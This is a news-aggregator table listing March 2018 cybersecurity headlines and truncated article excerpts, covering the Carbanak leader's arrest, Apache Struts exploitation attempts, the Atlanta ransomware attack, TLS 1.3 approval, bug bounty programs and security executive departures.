What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2018-03-26 18:30:02 | Ukrainian Suspected of Leading Carbanak Gang Arrested in Spain (lien direct) | A Ukrainian national suspected of being the leader of a gang that used Carbanak malware to steal a significant amount of money from banks worldwide has been arrested in Spain, Europol and the Spanish government announced on Monday. According to authorities, the man is believed to be the mastermind of an operation that resulted in losses totaling over €1 billion ($1.24 billion). The hackers targeted over 100 financial organizations in more than 40 countries around the world, stealing up to €10 million ($12.4 million) in a single heist. The suspect was arrested in Alicante, Spain, following an investigation conducted by the Spanish National Police and supported by Europol, private cybersecurity firms, and law enforcement agencies in the United States, Romania, Belarus and Taiwan. Spain's interior ministry identified the suspect as Ukrainian national “Denis K” and noted that he ran the operation with help from three Russian and Ukrainian nationals. The mastermind of the operation had been working from Spain, and he found his accomplices online, but they never met in person. The gang targeted ATMs in Spain's capital city of Madrid in the first quarter of 2017, stealing half a million euros. Police seized computers, jewelry worth €500,000 ($620,000), documents, and two luxury vehicles following Denis K's arrest. Bank accounts and two houses valued at roughly €1 million ($1.24 million) were also blocked. The cybercrime group, tracked as Carbanak, Anunak and Cobalt, has been around since at least 2013 and its activities were first detailed in 2014. According to Spain's interior ministry, investigations into the group started in 2015. According to Europol, the cybercriminals started out by using a piece of malware they had dubbed Anunak. They later improved their malware, a version that the cybersecurity industry has dubbed Carbanak. Starting with 2016, they launched more sophisticated attacks using a custom version of the penetration testing tool Cobalt Strike. It's worth noting that this is not the only cybercrime group known to use the Carbanak malware. The hackers delivered their malware to bank employees using spear-phishing emails. Once the malware was deployed, it gave attackers access to the compromised organization's internal network, including servers controlling ATMs. The cybercriminals used their access to these servers to remotely instruct ATMs to dispense cash at a predetermined time, when the group's mules would be nearby to collect the money. They also transferred funds from the targeted bank to their own accounts, and modified balances to allow members of the gang to withdraw large amounts of money at cash mac | Guideline | ||
|
2018-03-26 17:46:02 | Former Barclays CISO to Head WEF\'s Global Center for Cybersecurity (lien direct) | Troels Oerting to Head the Global Centre for Cybersecurity The 48th annual meeting of the World Economic Forum (WEF) at Davos, Switzerland, in January announced the formation of a new Global Centre for Cybersecurity. Today it announced that Troels Oerting will be its first Head, assuming the role on April 2, 2018. Oerting has been the group chief information security officer (CISO) at Barclays since February 2015. Before that he was head of the European Cybercrime Centre (EC3) -- part of Europol formed in 2013 to strengthen LEA response to cross-border cybercrime in the EU -- and head of the Europol Counter Terrorist and Financial Intelligence Center (since 2012). He also held several other law enforcement positions (such as Head of the Serious Organised Crime Agency with the Danish National Police), and also chaired the EU Financial Cybercrime Coalition. Oerting brings to WEF's Global Center for Cybersecurity a unique combination of hands-on cybersecurity expertise as Barclay's CISO, together with experience of and contacts within European-wide cyber intelligence organizations, and a deep knowledge of the financial crimes that will be of particular significance to WEF's members. It is a clear statement from the WEF that the new center should be taken seriously. “The Global Centre for Cybersecurity is the first global platform to tackle today's cyber-risks across industries, sectors and in close collaboration with the public sector. I'm glad that we have found a proven leader in the field who is keen and capable to help us address this dark side of the Fourth Industrial Revolution,” said Klaus Schwab, founder and executive chairman of the World Economic Forum. WEF's unique position at the heart of trans-national business, with the ear of governments, provides the opportunity to develop a truly global approach to cybersecurity. Most current cybersecurity regulations and standards are based on national priorities aimed against an adversary that knows no national boundaries. The aims of the new center are to consolidate existing WEF initiatives; to establish an independent library of best practices; to work towards an appropriate and agile regulatory framework on cybersecurity; and to provide a laboratory and early-warning think tank on cybersecurity issues. Related: World Economic Forum Announces New Fintech Cybersecurity Consortium Related: World Economic Forum Publishes Cyber Resil | Guideline | ||
|
2018-03-26 16:46:03 | (Déjà vu) Watering Hole Attack Exploits North Korea\'s Flash Flaw (lien direct) | An attack leveraging the compromised website of a Hong Kong telecommunications company is using a recently patched Flash vulnerability that has been exploited by North Korea since mid-November 2017, Morphisec warns. The targeted vulnerability, CVE-2018-4878, first became public in early February, after South Korea's Internet & Security Agency (KISA) issued an alert on it being abused by a North Korean hacker group. Adobe patched the flaw within a week. By the end of February, cybercriminals were | |||
|
2018-03-26 15:27:02 | One Year Later, Hackers Still Target Apache Struts Flaw (lien direct) | One year after researchers saw the first attempts to exploit a critical remote code execution flaw affecting the Apache Struts 2 framework, hackers continue to scan the Web for vulnerable servers. The vulnerability in question, tracked as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10. The security hole was addressed on March 6, 2017 with the release of versions 2.3.32 and 2.5.10.1. The bug, caused due to improper handling of the Content-Type header, can be triggered when performing file uploads with the Jakarta Multipart parser, and it allows a remote and unauthenticated attacker to execute arbitrary OS commands on the targeted system. The first exploitation attempts were spotted one day after the patch was released, shortly after someone made available a proof-of-concept (PoC) exploit. Some of the attacks scanned servers in search of vulnerable Struts installations, while others were set up to deliver malware. Guy Bruneau, researcher and handler at the SANS Internet Storm Center, reported over the weekend that his honeypot had caught a significant number of attempts to exploit CVE-2017-5638 over the past two weeks. The expert said his honeypot recorded 57 exploitation attempts on Sunday, on ports 80, 8080 and 443. The attacks, which appear to rely on a publicly available PoC exploit, involved one of two requests designed to check if a system is vulnerable. Bruneau told SecurityWeek that he has yet to see any payloads. The researcher noticed scans a few times a week starting on March 13, coming from IP addresses in Asia. “The actors are either looking for unpatched servers or new installations that have not been secured properly,” Bruneau said. The CVE-2017-5638 vulnerability is significant as it was exploited by cybercriminals last year to hack into the systems of U.S. credit reporting agency Equifax. Attackers had access to Equifax systems for more than two months and they managed to obtain information on over 145 million of the company's customers. The same vulnerability was also leveraged late last year in a campaign that involved NSA-linked exploits and cryptocurrency miners. | Guideline | Equifax | |
|
2018-03-26 14:12:04 | (Déjà vu) Pentagon Looks to Counter Ever-stealthier Warfare (lien direct) | The US military has for years enjoyed a broad technological edge over its adversaries, dominating foes with superior communications and cyber capabilities. Now, thanks to rapid advances by Russia and China, the gap has shrunk, and the Pentagon is looking at how a future conflict with a "near-peer" competitor might play out. Air Force Secretary Heather Wilson recently warned that both Russia and China are experimenting with ways to take out the US military's satellites, which form the backbone of America's warfighting machine. "They know that we are dominant in space, that every mission the military does depends on space, and in a crisis or war they are demonstrating capabilities and developing capabilities to seek to deny us our space assets," Wilson said. "We're not going to let that happen." The Pentagon is investing in a new generation of satellites that will provide the military with better accuracy and have better anti-jamming capabilities. Such technology would help counter the type of "asymmetric" warfare practised by Russia, which combines old-school propaganda with social media offensives and cyber hacks. Washington has blamed Moscow for numerous cyber attacks, including last year's massive ransomware attack, known as NotPetya, which paralyzed thousands of computers around the world. US cyber security investigators have also accused the Russian government of a sustained effort to take control of critical US infrastructure systems, including the energy grid. Russia denies involvement and so far, such attacks have been met with a muted US military response. - Public relations shutdown - General John Hyten, who leads US Strategic Command (STRATCOM), told lawmakers the US has "not gone nearly far enough" in the cyber domain. He also warned that the military still does not have clear authorities and rules of engagement for when and how it can conduct offensive cyber ops. "Cyberspace needs to be looked at as a warfighting domain, and if somebody threatens us in cyberspace, we need to have the authorities to respond," Hyten told lawmakers this week. Hyten's testimony comes after Admiral Michael Rogers, who heads both the NSA -- the leading US electronic eavesdropping agency -- and the new US Cyber Command, last month said President Donald Trump had no | Guideline | NotPetya | |
|
2018-03-26 13:19:01 | (Déjà vu) Energy Sector Most Impacted by ICS Flaws, Attacks: Study (lien direct) | The energy sector was targeted by cyberattacks more than any other industry, and many of the vulnerabilities disclosed last year impacted products used in this sector, according to a report published on Monday by Kaspersky Lab. The security firm has analyzed a total of 322 flaws disclosed in 2017 by ICS-CERT, vendors and its own researchers, including issues related to industrial control systems (ICS) and general-purpose software and protocols used by industrial organizations. Of the total number of security holes, 178 impact control systems used in the energy sector. Critical manufacturing organizations – this includes manufacturers of primary metals, machinery, electrical equipment, and transportation equipment – were affected by 164 of these vulnerabilities. Other industries hit by a significant number of vulnerabilities are water and wastewater (97), transportation (74), commercial facilities (65), and food and agriculture (61). Many of the vulnerabilities disclosed last year impacted SCADA or HMI components (88), industrial networking devices (66), PLCs (52), and engineering software (52). However, vulnerabilities in general purpose software and protocols have also had an impact on industrial organizations, including the WPA flaws known as KRACK and bugs affecting Intel technology. Learn More at SecurityWeek's ICS Cyber Security Conference As for the types of vulnerabilities, nearly a quarter are web-related and 21 percent are authentication issues. A majority of the flaws have been assigned severity ratings of medium or high, but 60 weaknesses are considered critical based on their CVSS score. Kaspersky pointed out that all vulnerabilities with a CVSS score of 10 are related to authentication and they are all easy to exploit remotely. Kaspersky said 265 of the vulnerabilities can be exploited remotely without authentication and without any special knowledge or skills. It also noted that exploits are publicly available for 17 of the security holes. The company has also shared data on malware infections and other security incidents. In the second half of 2017, Kaspersky security products installed on industrial automation systems detected nearly 18,000 malware variants from roughly 2,400 families. Malware attacks were blocked on almost 38 percent of ICS computers protected by the company, which was slightly less than in the second half of the previous year. Again, the energy sector was the most impacted. According to the security firm, roughly 40 percent of the devices housed by energy organizations were targeted. | Guideline | Wannacry | ★★★★★ |
|
2018-03-26 12:25:00 | Drupal to Patch Highly Critical Vulnerability This Week (lien direct) | Drupal announced plans to release a security update for Drupal 7.x, 8.3.x, 8.4.x, and 8.5.x on March 28, 2018, aimed at addressing a highly critical vulnerability. The Drupal security team hasn't provided information on the vulnerability and says it won't release any details on it until the patch arrives. An advisory containing all the necessary information will be published on March 28. Before that, however, the team advises customers to be prepared for the update's release and to apply it immediately after it is published, given its high exploitation potential. “The Drupal Security Team urges you to reserve time for core updates at that time because exploits might be developed within hours or days,” Drupal announced. The highly popular content management system (CMS) powers over one million sites and is used by a large number of e-commerce businesses. | |||
|
2018-03-26 05:39:04 | IETF Approves TLS 1.3 (lien direct) | The Internet Engineering Task Force (IETF) last week announced the approval of version 1.3 of the Transport Layer Security (TLS) traffic encryption protocol. The Internet standards organization has been analyzing proposals for TLS 1.3 since April 2014 and it took 28 drafts to get it to its current form.
TLS is designed to allow client and server applications to communicate over the Internet securely. It provides authentication, confidentiality, and integrity mechanisms that should prevent eavesdropping and tampering, even by an attacker who has complete control over the network.
There are nearly a dozen major functional differences between TLS 1.2 and TLS 1.3, including ones that should improve performance and eliminate the possibility of certain types of attacks, such as the recently disclosed ROBOT method. The most important changes have been described by the IETF as follows:
The list of supported symmetric algorithms has been pruned of all algorithms that are considered legacy. Those that remain all use Authenticated Encryption with Associated Data (AEAD) algorithms. The ciphersuite concept has been changed to separate the authentication and key exchange mechanisms from the record protection algorithm (including secret key length) and a hash to be used with the key derivation function and HMAC.
A 0-RTT mode was added, saving a round-trip at connection setup for some application data, at the cost of certain security properties.
Static RSA and Diffie-Hellman cipher suites have been removed; all public-key based key exchange mechanisms now provide forward secrecy.
All handshake messages after the ServerHello are now encrypted. The newly introduced EncryptedExtension message allows various extensions previously sent in clear in the ServerHello to also enjoy confidentiality protection from active attackers.
|
Guideline | ||
|
2018-03-24 02:20:05 | (Déjà vu) UK Regulators Search Cambridge Analytica Offices (lien direct) | British regulators on Friday began searching the London offices of Cambridge Analytica (CA), the scandal-hit communications firm at the heart of the Facebook data scandal, shortly after a judge approved a search warrant. Around 18 enforcement agents from the office of Information Commissioner Elizabeth Denham entered the company's London headquarters at around 8:00pm (2000 GMT) to execute the warrant. The High Court granted the raid request less than an hour earlier, as Denham investigates claims that Cambridge Analytica may have illegally harvested Facebook data for political ends. A full explanation of the legal ruling by Judge Anthony James Leonard will be issued on Tuesday, according to the court. "We're pleased with the decision of the judge," Denham's office said on Twitter. "This is just one part of a larger investigation into the use of personal data and analytics for political purposes," it added in a statement. "As you will expect, we will now need to collect, assess and consider the evidence before coming to any conclusions." The data watchdog's probe comes amid whistleblower accusations that CA, hired by Donald Trump during his primary campaign, illegally mined tens of millions of users' Facebook data and then used it to target potential voters. Fresh allegations also emerged Friday night about the firm's involvement in the 2016 Brexit referendum campaign. Brittany Kaiser, CA's business development director until two weeks ago, revealed it conducted data research for Leave.EU, one of the leading campaign groups, via the UK Independence Party (UKIP), according to The Guardian. 'I was lying' Kaiser, 30, told the newspaper she felt the company's repeated public denials it ever worked on the poll misled British lawmakers and the public. "In my opinion, I was lying," she said. "In my opinion I felt like we should say, 'this is exactly what we did.'" CA's suspended chief executive Alexander Nix told MPs last month: "We did not work for Leave.EU. We have not undertaken any paid or unpaid work for them, OK?" Nix was suspended this week following the Facebook revelations and a further media sting in which he boasts about entrapping politicians and secretly operating in elections around the world through shadowy front companies. | Guideline | ||
|
2018-03-23 19:45:03 | (Déjà vu) Ransomware Hits City of Atlanta (lien direct) | A ransomware attack -- possibly a variant of SamSam -- has affected some customer-facing applications and some internal services at the City of Atlanta. The FBI and incident response teams from Microsoft and Cisco are investigating. The city's police department, water services and airport are not affected. The attack was detected early on Thursday morning. By mid-day the city had posted an outage alert to Twitter. In a press conference held Thursday afternoon, mayor Keisha Bottoms announced that the breach had been ransomware. She gave no details of the ransomware demands, but noticeably declined to say whether the ransom would be payed or refused. Bottoms could not at this stage confirm whether personal details had also been stolen in the same breach, but suggested that customers and staff should monitor their credit accounts. Questions on the viability of data backups and the state of system patches were not clearly answered; but it was stressed that the city had adopted a 'cloud first' policy going forwards specifically to improve security and mitigate against future ransomware attacks. A city employee obtained and sent a screenshot of the ransom note to local radio station 11Alive. The screenshot shows a bitcoin demand for $6,800 per system, or $51,000 to unlock all systems. It is suggested that the ransom note is similar to ones used by the SamSam strain of ransomware. Steve Ragan subsequently tweeted, "1 local, 2 remote sources are telling me City of Atlanta was hit by SamSam. The wallet where the ransom is to be sent (if they pay) has collected $590,000 since Jan 27." SamSam ransomware infected two healthcare organizations earlier this year. SamSam is not normally introduced via a phishing attack, but rather following a pre-existing breach. This could explain the concern over data theft on top of the data encryption. It also raises the question over whether the initial breach was due to a security failure, an unpatched system, or via a third-party supplier. Ransomware is not a new threat, and there are mitigations -- but it continues to cause havoc. Official advice is, wherever at all possible, refuse to pay. The theory is if the attackers cease getting a return on their attacks, they will turn to something easier with a better ROI on their time. This approach simply isn't working. Sometimes payment can be avoided by recovering data from backups | NotPetya Wannacry | ||
|
2018-03-23 19:20:04 | (Déjà vu) Facebook as an Election Weapon, From Obama to Trump (lien direct) | The use of Facebook data to target voters has triggered global outrage with the Cambridge Analytica scandal. But the concept is nothing new: Barack Obama made extensive use of the social network in 2008 and stepped up "micro-targeting" in his 2012 re-election effort. The unauthorized gathering of data on 50 million Facebook users by a British consulting firm that worked for Donald Trump has sparked intense debate on how politicians and marketers -- appropriately or not -- use such personal information. But Cambridge Analytica, the firm at the center of the firestorm, has stressed it is far from alone in using data gleaned online to precisely target voters. "Obama's 2008 campaign was famously data-driven, pioneered micro-targeting in 2012, talking to people specifically based on the issues they care about," the British firm said on Twitter. Former members of the Obama team fiercely dispute any comparison to the Cambridge Analytica case, in which an academic researcher is accused of scooping up a massive trove of data without consent using a Facebook personality quiz, and transferring it improperly to the firm. "How dare you!" tweeted Michael Simon, who headed Obama's micro-targeting team in 2008, in response to the firm. "We didn't steal private Facebook profile data from voters under false pretenses. OFA (Obama's campaign) voluntarily solicited opinions of hundreds of thousands of voters. We didn't commit theft to do our groundbreaking work." Jeremy Bird, a member of the 2012 Obama team, echoed those sentiments, warning: "Do not use the Obama campaign to justify your shady business." But while Cambridge Analytica's methods for acquiring data are in dispute, the underlying goal -- using social media to take the pulse of voters and find those who are persuadable -- was common to both campaigns. So-called micro-targeting, which borrows techniques from the marketing world, is as much about mobilizing voters and getting them to the polls as about changing minds. And micro-targeting long pre-dates the internet, with campaigns as early as 1976 using this method, according to Victoria Farrar-Myers, a political scientist and researcher at Southern Methodist University. Everyone who uses social media makes a decision to share some personal information, she says, although they "may not be fully aware of how people can utilize that." "Being able to micro-target a voter down to what magazine they read and what issues might make them turn out does have an advantage for a candidate when they're running for an election." | |||
|
2018-03-23 14:50:03 | U.S. Imposes Sanctions on Iranians for Hacking (lien direct) | The United States imposed sanctions on Friday on 10 Iranians and an Iranian company for alleged hacking of hundreds of universities in the US and abroad and the theft of "valuable intellectual property and data."
The Mabna Institute "engaged in the theft of personal identifiers and economic resources for private financial gain" and for the benefit of Iran's Islamic Revolutionary Guard Corps, the US Treasury Department said.
The two founders of the Mabna Institute were among the 10 people whose assets are subject to US seizure, it said.
The Justice Department said nine of the 10 had been indicted separately for conspiracy to commit computer intrusions and other crimes.
Since 2013, the Mabna Institute carried out cyber intrusions into the computer systems of 144 US universities, the Treasury Department said, and 176 universities in 21 foreign countries.
"For many of these intrusions, the defendants acted at the behest of the Iranian government and, specifically, the Iranian Revolutionary Guard Corps, Deputy Attorney General Rod Rosenstein said in a statement.
"The Department of Justice will aggressively investigate and prosecute hostile actors who attempt to profit from America's ideas by infiltrating our computer systems and stealing intellectual property," Rosenstein added.
|
|||
|
2018-03-23 12:42:03 | Pwner of a Lonely Heart: The Sad Reality of Romance Scams (lien direct) | Valentine's Day is a special holiday, but for victims of romance scams it is a tragic reminder, not only of love lost, but financial loss as well. According to the FBI Internet Crime Complaint Center (IC3), romance scams accounted for $230 million in losses in 2016.
Men and women may jokingly refer to their significant other as their “partner in crime,” but when it comes to romance scams, this joke may become a sad reality. In additional to financial losses, many scammers may convince their victims to become money mules or shipping mules, directly implicating them in illegal behavior.
Recently, Agari researchers identified a woman in Los Angeles that has sent nearly half a million dollars to a scammer that she has never even met. Even worse, this woman knowingly cashes bad checks and fake money orders on his behalf. The FBI has warned her to stop, yet it is unlikely she will do so.
The victims of romance scams are typically women in their 40s to 50s, usually divorced or widowed and looking for a new relationship. They are targeted by scam artists on dating web sites, who have the ability to refine their searches for women that fit their target demographics.
The scam artists create profiles of charming and successful men to engage these lonesome women. Dating sites frequently ask what women are looking for in a partner, so it is easy for the scammer to say exactly what they need to seem like “Mr. Right.”
Once these scammers engage with their victims, there are an inevitable variety of excuses why they can't meet – claims of overseas military service or mission trips are common, and help to further cement the supposed righteousness of the scammer. After a few months of correspondence, the scammer will claim a supposed tragedy: a lost paycheck or medical fees are common – and request a small loan. The typical loss in these scams is $14,000, not to mention the considerable psychological damage – victims of romance scams frequently withdraw from their social circles, embarrassed by the stigma.
Even worse, such as the case of our anonymous victim, some of these scams can continue on for years, with frequent requests for financial support. Once trust is established with their victims, these scammers may also to begin to use them as “mules” to cash fake checks, make deposits, accept shipment of stolen goods, and more. In the case of our anonymous victim, her family has pleaded with her to stop sending her suitor more money, and the FBI has warned her that her behavior is illegal; and yet she persists.
|
Guideline | Equifax Yahoo | |
|
2018-03-23 12:05:01 | TrickBot Gets Computer Locking Capabilities (lien direct) | A recently observed variant of the TrickBot banking Trojan has added a new module that can lock a victim's computer for extortion purposes, Webroot reports. First observed in late 2016 and said to be the work of cybercriminals behind the notorious Dyre Trojan, TrickBot has seen numerous updates that expanded not only its capabilities, but also its target list. Last year, the malware received an update that added worm-like capabilities, allowing it to spread locally via Server Message Block (SMB). Webroot now says that the malware attempts to leverage | |||
|
2018-03-22 18:44:01 | (Déjà vu) Worried About Being on Facebook? Some Options Explained (lien direct) | 
A snowballing Facebook scandal over the hijacking of personal data from millions of its users has many wondering whether it's time to restrict access to their Facebook information or even leave the social network altogether, with the #deletefacebook movement gaining traction.
Here are some options open to the worried Facebook user.
Put it to sleep
Putting a Facebook account on hold used to be difficult but has become a lot easier.
To deactivate their account, users need to go on their "settings" page, then on to "manage account", where they can "deactivate" their account. Facebook defines this action as putting activity "on hold".
The move disables a user's profile and removes their name and pictures from most things they have shared.
Some information may still remain visible, like a user's name in a friend's list, or messages exchanged with friends.
If they have second thoughts, users can easily restore a de-activated profile.
Kill the account
Deleting an account is a more radical step, as users will not be able to access it again once they've gone for that option.
Facebook warns users that it can take up to 90 days to purge the network of a user's posts.
Even so, some information is likely to stay online, for example messages sent to friends.
According to French data expert Nathalie Devillier there is also a chance that Facebook holds on to information about some users if asked to by US authorities in the name of national security.
Be more alert
Facebook users can check with the network how much of their personal information is accessible on the network.
In "settings", the option "download a copy of your Facebook data" allows a user to do just that.
Once Facebook has double-checked a user's password, the site compiles and then e-mails a compressed file.
The file gives an overview of the pictures and videos a user has posted, their downloaded apps, |
|||
|
2018-03-22 16:54:01 | (Déjà vu) You Can DDoS an Organization for Just $10 per Hour: Cybercrime Report (lien direct) | The cost of having an organization targeted by a distributed denial of service (DDoS) attack for an hour is as low as $10, cybersecurity firm Armor says. The low cost of launching such attacks results from the proliferation of cybercrime-as-a-service, one of the most profitable business models adopted by cybercriminals over the past years. It allows criminals-wannabe to employ the resources of established cybercriminals for their nefarious purposes, including malware distribution, DDoS-ing, spam, and more. All that miscreants have to do is to access underground markets or forums and hire the desired cybercrime service to conduct the malicious actions for them. And while the incurred financial losses total billions or even more for affected organizations, the price of hiring such a service is highly affordable to anyone. According to Armor's The Black Market Report: A Look into the Dark Web | Guideline | ||
|
2018-03-22 16:21:01 | GitHub Security Alerts Lead to Fewer Vulnerable Code Libraries (lien direct) | GitHub says the introduction of security alerts last year has led to a significantly smaller number of vulnerable code libraries on the platform. The code hosting service announced in mid-November 2017 the introduction of a new security feature designed to warn developers if the software libraries used by their projects contain any known vulnerabilities. The new feature looks for vulnerable Ruby gems and JavaScript NPM packages based on MITRE's Common Vulnerabilities and Exposures (CVE) list. When a new flaw is added to this list, all repositories that use the affected version are identified and their maintainers informed. Users can choose to be notified via the GitHub user interface or via email. When it introduced security alerts, GitHub compared the list of vulnerable libraries to the Dependency Graph in all public code repositories. The Dependency Graph is a feature in the Insights section of GitHub that lists the libraries used by a project. Since the introduction of security alerts, this section also informs users about vulnerable dependencies, including CVE identifiers and severity of the flaws, and provides advice on how to address the issues. The initial scan conducted by GitHub revealed more than 4 million vulnerabilities in over 500,000 repositories. Affected users were immediately notified and by December 1, roughly two weeks after the launch of the new feature, more than 450,000 of the flaws were addressed either by updating the affected library or removing it altogether. According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers. “Since [December 1], our rate of vulnerabilities resolved in the first seven days of detection has been about 30 percent,” GitHub said. “Additionally, 15 percent of alerts are dismissed within seven days-that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.” GitHub was recently hit by a record-breaking distributed denial-of-service (DDoS) attack that peaked at 1.3 Tbps, but the service was down for less than 10 minutes. Related: GitHub Enforces Stronger Encryption Related: Slack Tokens Leaked on GitHub Put Companies at Risk | Guideline | ||
|
2018-03-22 15:30:01 | (Déjà vu) Iran-linked Hackers Adopt New Data Exfiltration Methods (lien direct) | An Iran-linked cyber-espionage group has been using new malware and data exfiltration techniques in recent attacks, security firm Nyotron has discovered. The threat actor, known as OilRig, has been active since 2015, mainly targeting United States and Middle Eastern organizations in the financial and government industries. The group has been already observed using multiple tools and adopting new exploits fast, as well as switching to new Trojans in | Guideline | APT 34 | |
|
2018-03-22 15:10:01 | Security Practitioners: 10 Signs You Need to be More Direct (lien direct) | Conflict isn't Pleasant, But Sometimes it Can be Healthy and Necessary When Done Properly and Respectfully Living and working in different cultures gives you a broader perspective across a variety of different areas than you might have attained otherwise. It is one of the things I am most grateful for professionally and has taught me to appreciate that each culture has its own advantages and disadvantages. There is one particular aspect of some cultures that I think we in security can learn a lot from. Which cultural aspect am I referring to? Directness. Those of you who know me know that I am very direct and that I am a big proponent of directness. Directness is something that some cultures do better than others. So how can we as security practitioners identify areas in which directness can help us improve? I present: 10 signs you need to be more direct. 1. Bad ideas hang around: I remember watching the challenger explosion on television. After the investigation, groupthink was found to be one of the reasons that the launch was allowed to go ahead, despite known risks. People were simply afraid to state their concerns directly. While the stakes are certainly lower in your security organization, the principle holds true. If people are afraid to be direct, it often results in bad ideas hanging around far longer than they need to. Whereas in a direct culture, a bad idea can be considered and politely dismissed in a relatively short amount of time, in an indirect culture, it may linger far longer than it should. That results in valuable resources being spent on activities that don't provide much value. 2. Good ideas don't come forward: In a similar manner, if people are afraid to be direct, it often keeps them from suggesting new ideas. Perhaps the solution to that big problem you've been worried about is found in the thoughts of one of your team members. But if it stays there, it doesn't do you any good. 3. The team has no idea where it stands: Security teams need to know that the work they're doing adds value to the organization, improves its security posture, and helps mitigate risk. In order to gauge where they stand, the security team needs to know what success in each of those areas means. The only way I know of to communicate what success means is to do so directly. That enables the team to make progress more effectively. 4. Strategic direction and goals are unclear: Building on number 3, communicating strategic direction and goals clearly and directly helps the team understand where the organization is going and what success means. Not surprisingly, that clarity will assist the security team in maturing far more quickly and efficiently. 5. Everything is above average - always: I always love it when I hear people tell me that everyone on their team is exception | Guideline | ||
|
2018-03-22 14:36:05 | More Chrome OS Devices Receive Meltdown, Spectre Patches (lien direct) | The latest stable channel update for Google's Chrome OS operating system includes mitigations for devices with Intel processors affected by the Spectre and Meltdown vulnerabilities. Meltdown and Spectre attacks exploit design flaws in Intel, AMD, ARM and other processors. They allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). While Meltdown and Variant 1 can be addressed with software updates, Variant 2 also requires microcode updates from the manufacturers of the impacted processors. Software mitigations include kernel page-table isolation (KPTI/KAISER) and a technique developed by Google called Retpoline. Meltdown and Spectre were discovered independently by three teams of researchers. Google Project Zero researcher Jann Horn was one of the experts who found the flaws, which meant the company had enough time to work on patches before the details of the vulnerabilities were disclosed. In the case of Chrome OS, Google rolled out the first Meltdown mitigations with the release of version 63 in mid-December, more than two weeks before public disclosure. At the time, Google rolled out the KPTI/KAISER patch to roughly 70 Intel-based Chromebook models from Acer, ASUS, Dell, HP, Lenovo, Samsung and others. Google released Chrome OS 65 on Monday and informed users that it includes the KPTI mitigation against Meltdown for additional Intel devices with version 3.14 of the kernel. A status page created by Google to help users track the availability of Meltdown and Spectre patches for Chrome OS shows that all older Chromebooks with Intel processors, including with kernel versions 3.14 and 3.8, should get the KPTI mitigation for Meltdown with the release of Chrome OS 66, which is currently scheduled for release on April 24. Chrome OS 65 also brings the Retpoline mitigation for Spectre Variant 2 to all devices with Intel processors. Google noted that Variant 2 can be exploited using virtualization, and while Chrome OS devices don't use this type of feature, some measures have been taken to proactively protect users. In the case of Spectre Variant 1, the eBPF feature in the Linux kernel can be abused for exploitation, but Chrome OS is not impacted as it disables eBPF, Google said. The tech giant informs customers that Chrome O | |||
|
2018-03-22 12:42:01 | (Déjà vu) Netflix Launches Public Bug Bounty Program (lien direct) | Netflix announced on Wednesday the launch of a public bug bounty program with rewards of up to $15,000, and Dropbox has made some changes to its vulnerability disclosure policy, promising not to sue researchers. Netflix has had a vulnerability disclosure policy for the past 5 years and a private bug bounty program since September 2016. The company has now decided to make its bug bounty initiative public through the Bugcrowd platform. Its vulnerability disclosure policy and private bug bounty have helped Netflix patch 190 vulnerabilities. The private program started with 100 of Bugcrowd's top researchers, but more than 700 white hat hackers were later invited in preparation for the public program. Researchers can earn between $100 and $15,000 for flaws affecting one of several Netflix domains and the mobile applications for iOS and Android. The company claims the highest reward paid out to date is $15,000 for a critical security hole. The types of vulnerabilities that can be submitted include cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, authentication and authorization, data exposure, remote code execution, redirection, business logic, MSL protocol, and mobile API issues. Netflix says it acknowledges vulnerability reports, on average, in less than 3 days. “Engineers at Netflix have a high degree of ownership for the security of their products and this helps us address reports quickly,” Netflix said in a blog post. “Our security engineers also have the autonomy and freedom to make reward decisions quickly based on the reward matrix and bug severity. This ultimately helps create an efficient and seamless experience for researchers which is important for engagement in the program.” Dropbox makes changes to vulnerability disclosure policy Dropbox has not set a maximum amount of money that researchers can earn through its HackerOne-based bug bounty program. To date, the company has paid out more than $200,000 for over 220 vulnerabilities. However, the changes made by the company are not related to bounty amounts and instead they focus on the vulnerability disclosure policy and assuring researchers that they will not get sued even if they accidentally violate terms of the program. Several researchers have faced lawsuits recently over vulnerability disclosures, and Dropbox wants to help avoid such situations. The company has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.” Dropbox says it will allow researche | |||
|
2018-03-22 06:06:00 | Google, Twitter Security Chiefs Leaving Companies (lien direct) | Michael Coates, the chief information security officer (CISO) of Twitter, announced on Wednesday that he has decided to leave the social media giant. Google security chief Gerhard Eschelbeck has also announced his departure.
Coates, who joined Twitter in January 2015, says he will co-found a cybersecurity startup, but has not shared any details.
According to his LinkedIn profile, Coates has been working in cybersecurity since 2004, including at Motorola, Aspect Security and Shape Security. Between March 2010 and October 2013, he led Mozilla's Security Assurance program.
Until recently he was on the global board of directors of the OWASP Foundation, and is presently on the board of several organizations, including Comprehend Systems, Synack, and Vendor Security Alliance.
The Verge reported that Joseph Camilleri, a senior manager for information security and risk, will act as interim CISO at Twitter following Coates' departure.
Eschelbeck, vice president of security and privacy engineering at Google, also announced his departure on Wednesday, but has not shared his plans for the future.
Eschelbeck, known online as lcamtuf, previously held leadership positions at McAfee, Qualys, Webroot and Sophos. He joined Google in October 2014.
The announcements made by Eschelbeck and Coates come just days after reports that Facebook CISO Alex Stamos is leaving the social media giant in the wake of internal clashes over how to deal with the platform being used to spread misinformation.
“Despite the rumors, I'm still fully engaged with my work at Facebook,” Stamos said in response to a New York Times article on his alleged departure from Facebook. “It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security.”
Related: |
Guideline | ||
|
